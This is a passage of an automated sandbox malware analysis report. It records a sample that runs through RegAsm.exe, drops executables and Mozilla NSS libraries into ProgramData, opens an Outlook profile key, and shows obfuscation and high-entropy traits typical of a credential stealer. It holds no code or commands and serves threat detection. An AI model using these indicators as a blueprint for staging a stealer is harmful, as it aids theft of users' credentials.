Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\ProgramData\DHCGHDHIDH.exe	Section loaded: mscoree.dll
Source: C:\ProgramData\DHCGHDHIDH.exe	Section loaded: apphelp.dll
Source: C:\ProgramData\DHCGHDHIDH.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\DHCGHDHIDH.exe	Section loaded: version.dll
Source: C:\ProgramData\DHCGHDHIDH.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\DHCGHDHIDH.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\DHCGHDHIDH.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: webio.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\ProgramData\HDAFIIDAKJ.exe	Section loaded: mscoree.dll
Source: C:\ProgramData\HDAFIIDAKJ.exe	Section loaded: apphelp.dll
Source: C:\ProgramData\HDAFIIDAKJ.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\HDAFIIDAKJ.exe	Section loaded: version.dll
Source: C:\ProgramData\HDAFIIDAKJ.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\HDAFIIDAKJ.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\HDAFIIDAKJ.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dbghelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sxs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: mozglue.pdbP source: RegAsm.exe, 00000003.00000002.1426905335.000000006CBBD000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1976265384.000000006CA35000.00000002.00000001.01000000.00000009.sdmp, mozglue[1].dll.3.dr, mozglue[1].dll.29.dr, mozglue.dll.3.dr
Source:	Binary string: freebl3.pdb source: RegAsm.exe, 0000001D.00000002.1944158611.000000002492D000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.3.dr, freebl3.dll.3.dr, freebl3[1].dll.29.dr
Source:	Binary string: freebl3.pdbp source: RegAsm.exe, 0000001D.00000002.1944158611.000000002492D000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.3.dr, freebl3.dll.3.dr, freebl3[1].dll.29.dr
Source:	Binary string: nss3.pdb@ source: RegAsm.exe, 00000003.00000002.1427642500.000000006CD7F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr
Source:	Binary string: c:\par8k7z\obj\Re\ease\fsB.pdb0, source: file.exe
Source:	Binary string: c:\sl1g47f51c90hn\obj\Re\ease\fsB.pdb source: 66cf818156193_ldjfnsfd[1].exe.3.dr, userFBKFCFBFID.exe.3.dr, DHCGHDHIDH.exe.29.dr
Source:	Binary string: softokn3.pdb@ source: RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr, softokn3[1].dll.29.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: RegAsm.exe, 0000001D.00000002.1963284287.000000003C6D1000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.3.dr, vcruntime140[1].dll.29.dr, vcruntime140[1].dll.3.dr
Source:	Binary string: c:\sl1g47f51c90hn\obj\Re\ease\fsB.pdb0 source: 66cf818156193_ldjfnsfd[1].exe.3.dr, userFBKFCFBFID.exe.3.dr, DHCGHDHIDH.exe.29.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: RegAsm.exe, 0000001D.00000002.1955580137.00000000307F1000.00000004.00000020.00020000.00000000.sdmp, msvcp140[1].dll.3.dr, msvcp140.dll.3.dr
Source:	Binary string: nss3.pdb source: RegAsm.exe, 00000003.00000002.1427642500.000000006CD7F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr
Source:	Binary string: mozglue.pdb source: RegAsm.exe, 00000003.00000002.1426905335.000000006CBBD000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1976265384.000000006CA35000.00000002.00000001.01000000.00000009.sdmp, mozglue[1].dll.3.dr, mozglue[1].dll.29.dr, mozglue.dll.3.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 0000001D.00000002.1937546619.000000001E56E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1943691071.00000000244D8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.2215879261.000000002232B000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.29.dr
Source:	Binary string: softokn3.pdb source: RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr, softokn3[1].dll.29.dr
Source:	Binary string: c:\6yuam8\obj\Re\ease\fsB.pdb0 source: HDAFIIDAKJ.exe.29.dr, 66cf75d3791d7_vrewqgq[1].exe.3.dr, userIEHDAFHDHC.exe.3.dr
Source:	Binary string: c:\6yuam8\obj\Re\ease\fsB.pdb source: HDAFIIDAKJ.exe.29.dr, 66cf75d3791d7_vrewqgq[1].exe.3.dr, userIEHDAFHDHC.exe.3.dr
Source:	Binary string: c:\par8k7z\obj\Re\ease\fsB.pdb source: file.exe

Contains functionality to dynamically determine API calls

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

3_2_004195E0

PE file contains an invalid checksum

Source: 66cf75d3791d7_vrewqgq[1].exe.3.dr	Static PE information: real checksum: 0x377ad should be: 0x35e97
Source: DHCGHDHIDH.exe.29.dr	Static PE information: real checksum: 0x552b7 should be: 0x53da3
Source: userIEHDAFHDHC.exe.3.dr	Static PE information: real checksum: 0x377ad should be: 0x35e97
Source: HDAFIIDAKJ.exe.29.dr	Static PE information: real checksum: 0x377ad should be: 0x35e97
Source: userFBKFCFBFID.exe.3.dr	Static PE information: real checksum: 0x552b7 should be: 0x53da3
Source: sql[1].dll.29.dr	Static PE information: real checksum: 0x0 should be: 0x263795
Source: file.exe	Static PE information: real checksum: 0x3ca22 should be: 0x3ef0c
Source: 66cf818156193_ldjfnsfd[1].exe.3.dr	Static PE information: real checksum: 0x552b7 should be: 0x53da3

PE file contains sections with non-standard names

Source: freebl3.dll.3.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.3.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.3.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.3.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.3.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.3.dr	Static PE information: section name: .didat
Source: nss3.dll.3.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.3.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.3.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.3.dr	Static PE information: section name: .00cfg
Source: sql[1].dll.29.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.29.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.29.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.29.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.29.dr	Static PE information: section name: .00cfg

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041A9F5 push ecx; ret	3_2_0041AA08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CB7B536 push ecx; ret	3_2_6CB7B549
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_0043504B push ss; retf	24_2_0043504F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_0041AA05 push ecx; ret	29_2_0041AA18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6C9EB536 push ecx; ret	29_2_6C9EB549

Source: file.exe	Static PE information: section name: .text entropy: 7.986877735993568
Source: userFBKFCFBFID.exe.3.dr	Static PE information: section name: .text entropy: 7.993781178446662
Source: 66cf818156193_ldjfnsfd[1].exe.3.dr	Static PE information: section name: .text entropy: 7.993781178446662
Source: userIEHDAFHDHC.exe.3.dr	Static PE information: section name: .text entropy: 7.985801528758324
Source: 66cf75d3791d7_vrewqgq[1].exe.3.dr	Static PE information: section name: .text entropy: 7.985801528758324
Source: DHCGHDHIDH.exe.29.dr	Static PE information: section name: .text entropy: 7.993781178446662
Source: HDAFIIDAKJ.exe.29.dr	Static PE information: section name: .text entropy: 7.985801528758324

Drops PE files

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\vcruntime140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\vcruntime140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\66cf75d3791d7_vrewqgq[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\userFBKFCFBFID.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\userIEHDAFHDHC.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\mozglue[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\freebl3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\HDAFIIDAKJ.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\msvcp140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\nss3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\softokn3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\sql[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\DHCGHDHIDH.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\mozglue[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\softokn3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\freebl3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\66cf818156193_ldjfnsfd[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\nss3[1].dll	Jump to dropped file

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\HDAFIIDAKJ.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\DHCGHDHIDH.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

3_2_004195E0

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
